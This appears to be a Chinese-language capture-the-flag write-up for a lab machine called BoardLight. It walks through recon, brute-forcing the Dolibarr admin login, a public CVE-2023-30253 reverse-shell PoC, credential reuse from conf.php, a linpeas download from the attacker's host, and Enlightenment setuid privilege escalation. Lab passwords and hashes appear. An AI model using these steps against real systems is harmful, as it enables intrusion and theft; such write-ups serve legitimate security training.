0%

BoardLight

Dolibarr 代码执行漏洞、Enlightenment组件权限提升漏洞

BoardLight

信息搜集

nmap扫描一下

1
nmap -sV -v 10.10.11.11

扫描结果如下

1
2
3
PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

80端口有http服务并且为apache中间件,尝试访问一下

拉到最下面得到域名信息board.htb,添加到hosts文件中成功访问

爆破下子域名,得到crm.board.htb

1
gobuster vhost -u http://board.htb/ -w /home/rev1ve/shentou/dict/zi-yu-ming/subdomains-10000.txt --append-domain

同理添加到hosts文件即可访问,注意到Dolibarr 17.0.0

不过大部分漏洞都要登录到后台界面才能利用,猜测存在admin用户

burpsuite爆破密码得到admin,直接进行登录

去阿里云漏洞库搜索,可利用漏洞如下

1
2
3
4
5
6
7
8
9
10
CVE-2023-4197: Dolibarr ERP CRM (<= 18.0.1) 不正确的输入清理验证 RCE
CVE-2023-38888: Dolibarr ERP CRM 中的跨站脚本漏洞
CVE-2023-4198: Dolibarr ERP CRM (<= 17.0.3) 访问控制不当
CVE-2023-30253: Dolibarr 代码执行漏洞
CVE-2023-38886: Dolibarr 允许远程特权攻击者通过精心设计的命令/脚本执行任意代码
CVE-2023-38887: Dolibarr ERP CRM 中的文件上传漏洞
CVE-2023-5323: 跨站脚本 (XSS) - dolibarr/dolibarr 中的通用
CVE-2024-23817: Dolibarr 应用程序主页 HTML 注入漏洞
CVE-2024-29477: Dolibarr ERP CRM 安装过程中的代码注入漏洞
CVE-2024-31503: Dolibarr 容易遭受跨站请求伪造

CVE-2023-4197、CVE-2023-4198利用失败

在测试CVE-2023-30253的时候搜到网上现成的poc 脚本链接

直接反弹shell到本机

经过一番查找,在~/html/crm.board.htb/htdocs/conf路径下找到敏感文件conf.php

这里要先提升为完全交互式shell,不然后面连接数据库输入密码没反应

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

尝试本地mysql登录,密码为serverfun2$2023!!

1
mysql -u dolibarrowner -p -h localhost

连接成功后找到表llx_user,查询用户信息

1
select login,pass_crypted from llx_user;

查询结果如下

1
2
3
4
5
6
+----------+--------------------------------------------------------------+
| login | pass_crypted |
+----------+--------------------------------------------------------------+
| dolibarr | $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm |
| admin | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 |
+----------+--------------------------------------------------------------+

不过用john都爆不出来,私钥文件也找不到

之前有在/home下看到larissa用户,尝试用上面得到的数据库密码去ssh连接

拿到user的flag

经过一番查找,发现常见的提权方式比如sudo都不太行

于是上传linpeas去自动化探测漏洞(在本机开启http服务)

1
wget http://10.10.14.88/linpeas.sh

然后chmod给个执行权限直接执行

发现存在0.23.1版本的enlightenment组件

网上搜索找到利用enlightenment_sys二进制文件去权限提升的洞 参考文章

Enlightenment组件权限提升漏洞

Enlightenment 0.25.4之前版本中的enlightenment_sys允许本地用户获得特权,因为它是setuid root,并且系统库函数错误处理以/dev/.开始的路径名

用参考文章的exp打就行,得到root的flag